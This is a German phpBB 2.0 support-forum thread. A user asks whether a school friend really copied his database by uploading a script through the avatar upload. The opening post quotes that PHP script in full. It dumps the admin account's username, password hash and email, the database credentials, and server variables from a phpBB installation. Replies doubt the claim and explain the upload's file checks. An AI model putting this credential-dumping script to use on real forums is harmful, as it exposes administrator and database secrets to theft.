Freund meint Forum fast gehackt

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Gast660
Mitglied
Beiträge: 165
Registriert: 13.05.2005 13:57

Freund meint Forum fast gehackt

Beitrag von Gast660 »

Also ein Freund meint das er schon eine Kopie meiner Datenbank hat, indem er dieses Script per Avatar upload auf meinen Space geladen hat.

Code: Alles auswählen

<?php 

define('IN_PHPBB', true); 
$phpbb_root_path = ''; 
include($phpbb_root_path . '/extension.inc'); 
include($phpbb_root_path . '/db/mysql.'.$phpEx); 
include($phpbb_root_path . '/common.'.$phpEx); 
?> 

<b><h2>Do Not Worry About the Errors Above. The Information you Want is below :-) </h2></b> 

<h4> 
Admin Forum Information:  </h4> 
<?php 
$uid = '2'; 

      $sql = "SELECT user_id, username, user_password, user_email 
         FROM  ". USERS_TABLE ." 
         WHERE user_id = $uid"; 
      if ( !($result = $db->sql_query($sql)) ) 
      { 
         message_die(GENERAL_ERROR, 'Error in obtaining userdata', '', __LINE__, __FILE__, $sql); 
      } 

echo "<table>\n"; 
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) 
 { 
 echo "\t<tr>\n"; 
 foreach ($line as $col_value) 
   { 
   echo "\t\t<td> $col_value </td>\n"; 
   } 
 echo "\t<tr>\n"; 
 } 
echo "</table>\n"; 
?> 
<h4> 
Database Information:<br/></h4> 
Database Type = <?php echo $dbms;?><br/> 
DB Host = <?php echo $dbhost;?><br/> 
DB Name = <?php echo $dbname;?><br/> 
DB User = <?php echo $dbuser;?><br/> 
DB Password = <?php echo $dbpasswd;?><br/> 
DB Table Prefix = <?php echo $table_prefix;?><br/> 
<p> 
<p> 
<?php print "Document root is ".$_SERVER["DOCUMENT_ROOT"]."<br />"; 
print "This page is called ".$_SERVER["PHP_SELF"];    ?> 
<p> 
<p> 
<p> 
<p> 
<h4>And here is a load of useful info</h4></p> 
<?php 
print_r($_SERVER); 
?> 
<p> 
<p> 

<?php 
print $_SERVER[""];#Built in Variable name 
?>
Jetzt will er auch noch die PW´s mit bruteforce knacken .. ich bin allerdings ein bisschen verwirrt, da er eben zu mir meinte, dass ich ihm mal meine Datenbank schicken soll, weil er noch was überprüfen wolle. Ich habe es aber natürlich nicht gemacht !!!
gott

Beitrag von gott »

lass ihn mal mit bruteforce

die

Code: Alles auswählen

md5 hasch
kracken

kann schon mal bis zu 5 Jahre dauern...

je nach prozessor :-)
Gast660
Mitglied
Beiträge: 165
Registriert: 13.05.2005 13:57

Beitrag von Gast660 »

Aber wieso kann er einfach eine Kopie meiner Datenbank machen ???
gott

Beitrag von gott »

hast du sie gesehen?

oder nur

hören sagen?
Gast660
Mitglied
Beiträge: 165
Registriert: 13.05.2005 13:57

Beitrag von Gast660 »

Er meinte es nur !!!

Und er könne sie mir auch nicht schicken, da sie auf einem Server in Norwegen liege !!!

Und ich solle ihm meine Datenbank per ICQ schicken, weil er was überprüfen wolle ... was ich natürlich nicht gemacht habe !!!
gott

Beitrag von gott »

also hätte der Typ

Code: Alles auswählen

wirklich
Zugriff auf deine Datenbank hätte er ja schon alles löschen könnne

außerdem würde er wohl noch kaum DEINE :wink: Kopie brauchen!

ignorier den Typen einfach...
Gast660
Mitglied
Beiträge: 165
Registriert: 13.05.2005 13:57

Beitrag von Gast660 »

ignorier den Typen einfach...
Geht nicht ...

1. Er geht auf meine Schule
2. Ist er ein Freund von mir ( allerdings seit dem er Kifft nicht mehr so doll )

Aber ich brauche mir keine Sorgen zu machen ???
Benutzeravatar
DerGonzo
Mitglied
Beiträge: 732
Registriert: 14.09.2005 12:22
Wohnort: Dorsten

Beitrag von DerGonzo »

Das solltest Du auch nicht tun.
Wenn er sie wirklich auf einen Server hätte kopieren können, was sollte ihn dann daran hindern, sie auch woanders zu speichern?
Viel Gerede um dummes Zeugs!
Der will Dich verkäsematuckeln... :D
gott

Beitrag von gott »

hee - ich kiffe auch!

8)

Wenn du phpbb 2.0.17 hast wird er nicht viel machen können! Sei also beruhigt - so lange er nur redet ABER nichts macht ist es doch egal

Sag ihm du willst Beweise haben? Wie vernünftige Menschen bei Gott auch :-)

da müssen PROFIS erst mal Scripts schreiben die jeder versteht - gibt es ja für alle Vorgänger versionen schon...
Wird kommen, aber bis dahin gibt es auch schon ein update
Benutzeravatar
kellanved
Mitglied
Beiträge: 570
Registriert: 05.02.2005 15:15
Wohnort: Berlin

Beitrag von kellanved »

War denn das tolle Script wirklich auf Deinem Webspace?

Über den Avatar-Upload lassen sich Scripte kaum hochladen, da a) der Dateiname überprüft wird und b) auch der Dateityp überprüft wird.

Bei älteren phpBB Versionen mag es möglich sein Javascripts hochzuladen, aber die können keinesfalls die Datenbank auslesen.
Bitte keine Supportanfragen via PM
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“